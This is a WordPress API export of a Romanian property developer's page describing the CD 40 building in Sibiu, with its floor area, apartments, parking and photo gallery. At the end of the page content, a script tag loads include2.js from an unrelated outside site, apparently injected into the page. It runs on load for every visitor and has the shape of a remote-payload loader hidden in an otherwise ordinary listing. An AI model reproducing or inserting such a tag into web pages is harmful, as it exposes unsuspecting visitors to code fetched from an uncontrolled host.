{"id":1568,"date":"2019-07-05T14:44:35","date_gmt":"2019-07-05T14:44:35","guid":{"rendered":"https:\/\/new.maxdevelopment.ro\/?page_id=1568"},"modified":"2019-10-11T03:02:33","modified_gmt":"2019-10-11T03:02:33","slug":"cd-40","status":"publish","type":"page","link":"https:\/\/maxdevelopment.ro\/ro\/proiectele-noastre\/urban-living\/cd-40\/","title":{"rendered":"CD 40"},"content":{"rendered":"<h2><a href=\"https:\/\/new.maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-CD40-0015.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-1774\" src=\"https:\/\/new.maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-CD40-0015-300x198.jpg\" alt=\"\" width=\"347\" height=\"229\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-CD40-0015-300x198.jpg 300w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-CD40-0015-768x506.jpg 768w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-CD40-0015-1024x674.jpg 1024w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-CD40-0015.jpg 1500w\" sizes=\"auto, (max-width: 347px) 100vw, 347px\" \/><\/a>Calea Dumbr\u0103vii 40<\/h2>\n<p>Unul dintre cele mai recente proiecte realizate este imobilul Calea Dumbr\u0103vii nr. 40.\u00a0Acest proiect \u00eentrege\u0219te tabloul bulevardului urban din Sibiu prin designul contemporan \u0219i elementele arhitecturale distinctive. Jocul subtil al volumelor precum \u0219i liniile moderne ofer\u0103 armonie cl\u0103dirii, iar &#8222;cutiile de sticl\u0103&#8221; de pe fa\u021bad\u0103 sus\u021bin viziunea arhitectural\u0103 devenind trade-mark-ul ansamblului. Cl\u0103direa are o suprafa\u021b\u0103 desf\u0103\u0219urat\u0103 de 1.680m\u00b2 (4 etaje) av\u00e2nd func\u021biune mixt\u0103 (12 apartamente\/ birou-uri, 2 penthouse-uri \u0219i un restaurant). Parcarea subteran\u0103 dispune de 24 de locuri, astfel zona de gradin\u0103, in care s-a p\u0103strat \u0219i un nuc, poate fi folosit\u0103 cu scop recreativ sau ca teras\u0103.<\/p>\n<p>&nbsp;<\/p>\n<p><div id='gallery-1' class='czr-gallery row flex-row czr-gallery-style gallery galleryid-1568 gallery-columns-6 gallery-size-thumbnail'><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4012.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4012-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4012-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4012-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4015.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4015-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4015-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4015-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4003.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4003-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4003-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4003-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon portrait czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-D-CD-40-JAM16.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-D-CD-40-JAM16-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-D-CD-40-JAM16-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-D-CD-40-JAM16-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4009.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4009-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4009-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4009-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4010.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4010-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4010-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4010-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4013.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4013-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4013-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4013-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4007.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4007-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4007-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4007-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon portrait czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4005.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4005-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4005-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4005-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon portrait czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4006.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4006-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4006-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4006-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4002.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4002-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4002-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4002-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure><figure class='gallery-item col col-auto'>\r\n                        <div class='gallery-icon landscape czr-gallery-icon'>\r\n                              <a data-lb-type=\"grouped-gallery\" href=https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4014.jpg class=\"bg-link\"><\/a><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4014-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" sizes=\"auto, (min-width: 1200px) 160px, (min-width: 992px) 130px, (min-width: 768px) 90px, (min-width: 576px) 105px, calc( 50vw - 30px )\" srcset=\"https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4014-150x150.jpg 150w, https:\/\/maxdevelopment.ro\/wp-content\/uploads\/2019\/07\/MAX-development-Calea-Dumbravii-NR4014-510x510.jpg 510w\" \/>\r\n                        <\/div><\/figure>\r\n                  <\/div>\n<script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Calea Dumbr\u0103vii 40 Unul dintre cele mai recente proiecte realizate este imobilul Calea Dumbr\u0103vii nr. 40.\u00a0Acest proiect \u00eentrege\u0219te tabloul bulevardului urban din Sibiu prin designul contemporan \u0219i elementele arhitecturale distinctive. Jocul subtil al volumelor precum \u0219i liniile moderne ofer\u0103 armonie cl\u0103dirii, iar &#8222;cutiile de sticl\u0103&#8221; de pe fa\u021bad\u0103 sus\u021bin viziunea arhitectural\u0103 devenind trade-mark-ul ansamblului. Cl\u0103direa [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":216,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-1568","page","type-page","status-publish","czr-hentry"],"_links":{"self":[{"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/pages\/1568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/comments?post=1568"}],"version-history":[{"count":14,"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/pages\/1568\/revisions"}],"predecessor-version":[{"id":3110,"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/pages\/1568\/revisions\/3110"}],"up":[{"embeddable":true,"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/pages\/216"}],"wp:attachment":[{"href":"https:\/\/maxdevelopment.ro\/ro\/wp-json\/wp\/v2\/media?parent=1568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}